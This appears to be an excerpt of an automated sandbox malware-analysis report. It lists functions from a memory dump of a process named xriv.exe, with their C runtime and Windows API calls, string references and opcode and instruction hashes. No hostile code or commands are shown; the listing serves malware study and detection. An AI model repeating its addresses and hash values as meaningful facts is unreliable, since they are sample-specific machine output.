                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 2cc6a13d9104c0f3a739bef94cca43940c6e79b61364ece10b183434371f0dee
                              • Instruction ID: 1f2be8d8418dd30bb4a3b8a2d4e8f35a064ffe2b52c937df5b5b314b545c397f
                              • Opcode Fuzzy Hash: 2cc6a13d9104c0f3a739bef94cca43940c6e79b61364ece10b183434371f0dee
                              • Instruction Fuzzy Hash: C0F0FF7250420767DB24EFADE4C1C1A7BFDAA1477D7944846E55DE7980CA31F8C0C798
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID: *?
                              • API String ID: 269201875-2564092906
                              • Opcode ID: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
                              • Instruction ID: 45a17a3553970fd0756810c823cebabd21099987660d9b914b7af178fd54576c
                              • Opcode Fuzzy Hash: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
                              • Instruction Fuzzy Hash: 11613C75D0021A9FDF15EFADC8805EDFBF9EF88218B24816AD815E7340D675AE41CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: AdjustPointer
                              • String ID:
                              • API String ID: 1740715915-0
                              • Opcode ID: 2ed9c13cc54da67e82ad281702e5f5c117c014dc617b0174ada059649e7c78c6
                              • Instruction ID: 3929546214c4b503fd518ab24d28a5ea72abf471dcad00c651067b05855224f6
                              • Opcode Fuzzy Hash: 2ed9c13cc54da67e82ad281702e5f5c117c014dc617b0174ada059649e7c78c6
                              • Instruction Fuzzy Hash: C051C372600306AFFB29AF18D840BBABBA8FF5431DFA445ADDA01576D1E735E940C790
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetVersionExW.KERNEL32(0000011C,?,B7E58ED7,00000000), ref: 01374D89
                              • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01374DF0
                              • GetProcAddress.KERNEL32(00000000), ref: 01374DF7
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressHandleModuleProcVersion
                              • String ID:
                              • API String ID: 3310240892-0
                              • Opcode ID: 4f8bfc82ad7ad2441bcfd71b9859748ba6b20e258012bd3c639de3ae58c14686
                              • Instruction ID: f5121b301d51aba52ec137b73d4f59ecfe06b8958d7652ac3ac281f7a4c8709f
                              • Opcode Fuzzy Hash: 4f8bfc82ad7ad2441bcfd71b9859748ba6b20e258012bd3c639de3ae58c14686
                              • Instruction Fuzzy Hash: 65512971D142189BEB24EF68CD487DDBB75EB45328F5046A8E408A7781EB395E808B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _free.LIBCMT ref: 0139509E
                              • _free.LIBCMT ref: 013950C7
                              • SetEndOfFile.KERNEL32(00000000,013925FD,00000000,0138D4F0,?,?,?,?,?,?,?,013925FD,0138D4F0,00000000), ref: 013950F9
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,013925FD,0138D4F0,00000000,?,?,?,?,00000000), ref: 01395115
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFileLast
                              • String ID:
                              • API String ID: 1547350101-0
                              • Opcode ID: ed97c636fd034428af64d9bd126e03087c43568ab2d1c2cb410e88a0871e22d8
                              • Instruction ID: 93f9a1d1cedc1c019069256f0036cce7ba0718b5033920ecfb1afbf68ecf0985
                              • Opcode Fuzzy Hash: ed97c636fd034428af64d9bd126e03087c43568ab2d1c2cb410e88a0871e22d8
                              • Instruction Fuzzy Hash: F541D7729013079BEF13BBBCCC45A9E7BB9AF54368F180112F925A7395E634C88087A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0138AE0F: _free.LIBCMT ref: 0138AE1D
                                • Part of subcall function 01390971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,01394B40,?,00000000,00000000), ref: 01390A13
                              • GetLastError.KERNEL32 ref: 0138FA02
                              • __dosmaperr.LIBCMT ref: 0138FA09
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0138FA48
                              • __dosmaperr.LIBCMT ref: 0138FA4F
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                              • String ID:
                              • API String ID: 167067550-0
                              • Opcode ID: bae63502ee9d4303099598ef7cb0849c4f0bf7ee7a8ef67360584eda43117180
                              • Instruction ID: 76ba1e5a6d00c2b679e36528024e0adefb8cde61883dc79dea8c11df1a81fadb
                              • Opcode Fuzzy Hash: bae63502ee9d4303099598ef7cb0849c4f0bf7ee7a8ef67360584eda43117180
                              • Instruction Fuzzy Hash: 2521B67160030ABFEB21BF6D888082BF7ADEF0527C7104525F91997250EB35ED108B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetLastError.KERNEL32(?,00000000,?,0138AD8D,00000000,?,?,?,0138AF26,?), ref: 0138DF49
                              • _free.LIBCMT ref: 0138DFA6
                              • _free.LIBCMT ref: 0138DFDC
                              • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,0138AF26,?), ref: 0138DFE7
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast_free
                              • String ID:
                              • API String ID: 2283115069-0
                              • Opcode ID: 5c04f801b40375dc084ad680d4f1f0730e4031a01a2cb2b9ec74d464a82a8c79
                              • Instruction ID: f8308948a9a1d0f7392ca57bcd1f0351605476b9b66dc14a3da56d6996d8cdc5
                              • Opcode Fuzzy Hash: 5c04f801b40375dc084ad680d4f1f0730e4031a01a2cb2b9ec74d464a82a8c79
                              • Instruction Fuzzy Hash: 6311C8722087162BDA213BFDAC84E6B36BEDBD177DF640234F229976C0DE3198599210
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetLastError.KERNEL32(?,?,?,0138B7F5,0138DB7F,?,?,01388272,?,?,?,?,?,013720C3,?,?), ref: 0138E0A0
                              • _free.LIBCMT ref: 0138E0FD
                              • _free.LIBCMT ref: 0138E133
                              • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01388272,?,?,?,?,?,013720C3,?,?), ref: 0138E13E
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast_free
                              • String ID:
                              • API String ID: 2283115069-0
                              • Opcode ID: 48509dc0dd7c6721f9f1b93b3ca3d233c0a08b02ea0d2172fb391e170d8d0c12
                              • Instruction ID: cddf37ea17bbb7951c460e80444b3d7047c956619837ec2ba3d19678e8d4156f
                              • Opcode Fuzzy Hash: 48509dc0dd7c6721f9f1b93b3ca3d233c0a08b02ea0d2172fb391e170d8d0c12
                              • Instruction Fuzzy Hash: 2511C8722047266AD62177BEAC84D6B357EDBD177DF650234F129932C4DE718C528210
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0138E9E2,00000000,?,0139370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0138E893
                              • GetLastError.KERNEL32(?,0139370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0138E9E2,00000000,00000104,?), ref: 0138E89D
                              • __dosmaperr.LIBCMT ref: 0138E8A4
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorFullLastNamePath__dosmaperr
                              • String ID:
                              • API String ID: 2398240785-0
                              • Opcode ID: 60a33ad350c092154ede29b9593d07ffa243affa9bde66b191bdacc36ff6ec9a
                              • Instruction ID: 025090fda12a806209cfe5fcc4454d0e8561f3c8ee903a42a0bb89c2fb3b5230
                              • Opcode Fuzzy Hash: 60a33ad350c092154ede29b9593d07ffa243affa9bde66b191bdacc36ff6ec9a
                              • Instruction Fuzzy Hash: 02F03132600316BBDB207FAAD80895AFFAEFF556A57054931F519C6610C731E811DBD1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0138E9E2,00000000,?,01393695,00000000,00000000,0138E9E2,?,?,00000000,00000000,00000001), ref: 0138E8FC
                              • GetLastError.KERNEL32(?,01393695,00000000,00000000,0138E9E2,?,?,00000000,00000000,00000001,00000000,00000000,?,0138E9E2,00000000,00000104), ref: 0138E906
                              • __dosmaperr.LIBCMT ref: 0138E90D
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorFullLastNamePath__dosmaperr
                              • String ID:
                              • API String ID: 2398240785-0
                              • Opcode ID: 30be31df5ef7aaafddc882576e7e0d33e6cf8809b453e44dc53674c06e9aca8a
                              • Instruction ID: 0e80e231c0143deee31733eda2bac28cdea4871c3fdec35ab43efa76cc2f38e4
                              • Opcode Fuzzy Hash: 30be31df5ef7aaafddc882576e7e0d33e6cf8809b453e44dc53674c06e9aca8a
                              • Instruction Fuzzy Hash: B9F06D32200316BBDB207BAAC808956FFADFF442A97044534F528D6510C775E9218BD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • WriteConsoleW.KERNEL32(01375140,0000000F,013A68F8,00000000,01375140,?,01395AA7,01375140,00000001,01375140,01375140,?,01392ECD,00000000,?,01375140), ref: 013963A6
                              • GetLastError.KERNEL32(?,01395AA7,01375140,00000001,01375140,01375140,?,01392ECD,00000000,?,01375140,00000000,01375140,?,01393421,01375140), ref: 013963B2
                                • Part of subcall function 01396378: CloseHandle.KERNEL32(FFFFFFFE,013963C2,?,01395AA7,01375140,00000001,01375140,01375140,?,01392ECD,00000000,?,01375140,00000000,01375140), ref: 01396388
                              • ___initconout.LIBCMT ref: 013963C2
                                • Part of subcall function 0139633A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,01396369,01395A94,01375140,?,01392ECD,00000000,?,01375140,00000000), ref: 0139634D
                              • WriteConsoleW.KERNEL32(01375140,0000000F,013A68F8,00000000,?,01395AA7,01375140,00000001,01375140,01375140,?,01392ECD,00000000,?,01375140,00000000), ref: 013963D7
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                              • String ID:
                              • API String ID: 2744216297-0
                              • Opcode ID: 32f58c7546ec80fbb11bf4b50a807668aa5b34eccf5aeaa7420024d6a01224dc
                              • Instruction ID: 60a4c137580db4f082b0ae3deaa9ca6a2257ed5f6a66c508b2d38c462098bca5
                              • Opcode Fuzzy Hash: 32f58c7546ec80fbb11bf4b50a807668aa5b34eccf5aeaa7420024d6a01224dc
                              • Instruction Fuzzy Hash: 73F03037441265BBCF726F99EC45A893F6AFB497A5F044124FA1895224C6338920DB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SleepConditionVariableCS.KERNELBASE(?,01387157,00000064), ref: 013871DD
                              • LeaveCriticalSection.KERNEL32(013A9708,000000FF,?,01387157,00000064,?,?,?,01373E30,013AC468,B7E58ED7,?,00000000,01398818,000000FF), ref: 013871E7
                              • WaitForSingleObjectEx.KERNEL32(000000FF,00000000,?,01387157,00000064,?,?,?,01373E30,013AC468,B7E58ED7,?,00000000,01398818,000000FF), ref: 013871F8
                              • EnterCriticalSection.KERNEL32(013A9708,?,01387157,00000064,?,?,?,01373E30,013AC468,B7E58ED7,?,00000000,01398818,000000FF), ref: 013871FF
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                              • String ID:
                              • API String ID: 3269011525-0
                              • Opcode ID: 355448895a70e5506627952461e2e3cfc72cf3d85b28c66d892d9e40fa8dbd26
                              • Instruction ID: 242a2e165f895100c29893768e18c3f104386f1045ca04b8aedd2887df7851f1
                              • Opcode Fuzzy Hash: 355448895a70e5506627952461e2e3cfc72cf3d85b28c66d892d9e40fa8dbd26
                              • Instruction Fuzzy Hash: 36E01236541224BBCA216F55EC09BDA7E1DFB09B6AF410021F50576614C76399008BF5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _free.LIBCMT ref: 0138C8C4
                                • Part of subcall function 0138D653: HeapFree.KERNEL32(00000000,00000000,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?), ref: 0138D669
                                • Part of subcall function 0138D653: GetLastError.KERNEL32(?,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?,?), ref: 0138D67B
                              • _free.LIBCMT ref: 0138C8D7
                              • _free.LIBCMT ref: 0138C8E8
                              • _free.LIBCMT ref: 0138C8F9
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 38ebfac68b3d3b142d67e822d3824c8a79fcef1c0bcd082d760b6465d5f8844d
                              • Instruction ID: defab3e2672c14e6f9ea00096bf29178dc4c0db4c077f9659b4f0b153c658557
                              • Opcode Fuzzy Hash: 38ebfac68b3d3b142d67e822d3824c8a79fcef1c0bcd082d760b6465d5f8844d
                              • Instruction Fuzzy Hash: BDE0BF724406279ACB21BF58F80098D3B79A794B2CBC1C047E52837258EA3606D5DB85
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: -
                              • API String ID: 0-2547889144
                              • Opcode ID: 14557f31fca089dc27307abe4cd409f8dbbc917f8ecb7c9cb4737209d00a40cc
                              • Instruction ID: 21558dab96c8ed4ec2f07e845ce7747636ec810d0ada2481dcc3666233a67188
                              • Opcode Fuzzy Hash: 14557f31fca089dc27307abe4cd409f8dbbc917f8ecb7c9cb4737209d00a40cc
                              • Instruction Fuzzy Hash: 222251B0D052599BEF25EB28DD497CDBB75AB22308F5441D8C40927286DB751F88CF92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                              • API String ID: 0-203307410
                              • Opcode ID: 5657ca5ba55571635080374ab6aa9854d3df58202bd9334972bfac728fa2089d
                              • Instruction ID: d669034b8c707d2801f425ae10fe288b74032a1f0cfd542dd3dc8f00fd444a69
                              • Opcode Fuzzy Hash: 5657ca5ba55571635080374ab6aa9854d3df58202bd9334972bfac728fa2089d
                              • Instruction Fuzzy Hash: BA41B6B1A0031AAFDB21FF9D9880ADEBBFCEF95358F100066E504E7240D6718A45DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 01388FA2
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: EncodePointer
                              • String ID: MOC$RCC
                              • API String ID: 2118026453-2084237596
                              • Opcode ID: cc6f8e0e28fe653263f3214563324ceebe74095c4ced8c5e206e5cc11a8770a3
                              • Instruction ID: 10b361e8f8451d99fe9fc9e1663a5fb3086883708be34ce3b26efc838da99090
                              • Opcode Fuzzy Hash: cc6f8e0e28fe653263f3214563324ceebe74095c4ced8c5e206e5cc11a8770a3
                              • Instruction Fuzzy Hash: 0D413B71900209AFDF16EFA8DD80EEEBBB6FF88308F184099FA04A7251D3359951DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01382093
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileModuleName
                              • String ID: 5120$H
                              • API String ID: 514040917-2391956277
                              • Opcode ID: f516977dd000e3e8f81db5a6eb48f85ea8e07bf283662e300c23ef7c5b439c36
                              • Instruction ID: 18a7beb11d93ff5bfa40f584897a648b153d8eced247e03397ef31f185fd4b21
                              • Opcode Fuzzy Hash: f516977dd000e3e8f81db5a6eb48f85ea8e07bf283662e300c23ef7c5b439c36
                              • Instruction Fuzzy Hash: FE21BDB09003889BDB25FF28C9867DDBFB8AB02308F5401CCD54967282D7795B488BE3
                              Uniqueness

                              Uniqueness Score: -1.00%